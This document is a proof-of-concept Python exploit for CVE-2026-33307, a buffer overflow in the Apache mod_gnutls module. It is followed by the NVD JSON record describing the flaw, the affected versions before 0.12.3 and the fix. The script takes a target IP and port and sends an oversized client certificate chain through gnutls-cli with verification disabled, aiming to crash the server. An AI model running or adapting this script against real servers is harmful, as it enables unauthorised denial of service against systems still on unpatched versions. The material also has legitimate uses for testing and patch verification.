CVE-2026-33307

#!/usr/bin/env python3 """ PoC for CVE-2026-33307 (mod_gnutls Buffer Overflow) This script attempts to trigger the vulnerability by sending a TLS ClientHello with a large certificate chain using gnutls-cli or openssl. Note: You need to generate a certificate chain file 'large_chain.pem' containing more certificates than the fixed buffer size in mod_gnutls to trigger the crash. """ import sys import subprocess import os def exploit(target_ip, target_port): # Check if the large chain file exists chain_file = "large_chain.pem" if not os.path.exists(chain_file): print(f"[Error] {chain_file} not found.") print("Please create a certificate chain file with a large number of certificates to test.") return print(f"[*] Attempting to connect to {target_ip}:{target_port} with large certificate chain...") # Using gnutls-cli as it is the native client for mod_gnutls try: # --insecure: Ignore server certificate verification # --x509certfile: The file containing the certificate chain to send cmd = ["gnutls-cli", "--insecure", "-p", str(target_port), "--x509certfile", chain_file, target_ip] # Run the command. If vulnerable, the server (mod_gnutls) should segfault. # The client might also error out, but the goal is to crash the server. result = subprocess.run(cmd, capture_output=True, text=True, timeout=5) print("[*] Request sent.") print("[*] Check the server logs for a segmentation fault or crash.") except FileNotFoundError: print("[Error] gnutls-cli not found. Please install gnutls-bin.") except subprocess.TimeoutExpired: print("[*] Connection timed out (Server might have crashed).") except Exception as e: print(f"[Error] An exception occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_ip> <target_port>") sys.exit(1) exploit(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2026-33307", "sourceIdentifier": "[email protected]", "published": "2026-03-24T02:16:05.283", "lastModified": "2026-03-24T19:29:26.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mod_gnutls is a TLS module for Apache HTTPD based on GnuTLS. In versions prior to 0.12.3 and 0.13.0, code for client certificate verification imported the certificate chain sent by the client into a fixed size `gnutls_x509_crt_t x509[]` array without checking the number of certificates is less than or equal to the array size. `gnutls_x509_crt_t` is a `typedef` for a pointer to an opaque GnuTLS structure created using with `gnutls_x509_crt_init()` before importing certificate data into it, so no attacker-controlled data was written into the stack buffer, but writing a pointer after the last array element generally triggered a segfault, and could theoretically cause stack corruption otherwise (not observed in practice). Server configurations that do not use client certificates (`GnuTLSClientVerify ignore`, the default) are not affected. The problem has been fixed in version 0.12.3 by checking the length of the provided certificate chain and rejecting it if it exceeds the buffer length, and in version 0.13.0 by rewriting certificate verification to use `gnutls_certificate_verify_peers()`, removing the need for the buffer entirely. There is no workaround. Version 0.12.3 provides the minimal fix for users of 0.12.x who do not wish to upgrade to 0.13.0 yet."}, {"lang": "es", "value": "Mod_gnutls es un módulo TLS para Apache HTTPD basado en GnuTLS. En versiones anteriores a la 0.12.3 y 0.13.0, el código para la verificación de certificados del cliente importaba la cadena de certificados enviada por el cliente a un array de tamaño fijo gnutls_x509_crt_t x509[] sin comprobar que el número de certificados fuera menor o igual al tamaño del array. gnutls_x509_crt_t es un typedef para un puntero a una estructura opaca de GnuTLS creada usando gnutls_x509_crt_init() antes de importar datos de certificado en ella, por lo que no se escribieron datos controlados por el atacante en el búfer de pila, pero escribir un puntero después del último elemento del array generalmente provocaba un segfault, y teóricamente podría causar corrupción de pila de otra manera (no observado en la práctica). Las configuraciones del servidor que no utilizan certificados de cliente (GnuTLSClientVerify ignore, el valor predeterminado) no se ven afectadas. El problema se ha solucionado en la versión 0.12.3 comprobando la longitud de la cadena de certificados proporcionada y rechazándola si excede la longitud del búfer, y en la versión 0.13.0 reescribiendo la verificación de certificados para usar gnutls_certificate_verify_peers(), eliminando por completo la necesidad del búfer. No hay solución alternativa. La versión 0.12.3 proporciona la solución mínima para los usuarios de 0.12.x que aún no desean actualizar a la 0.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mod_gnutls_project:mod_gnutls:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.12.3", "matchCriteriaId": "1D9C870F-6C79-4E53-804A-A0F9893B31A3"}]}]}], "references": [{"url": "https://github.com/airtower-luna/mod_gnutls/commit/bf4f08c49acae528e97885082cdee460f4534dc1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/airtower-luna/mod_gnutls/security/advisories/GHSA-gjpm-55p4-c76r", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}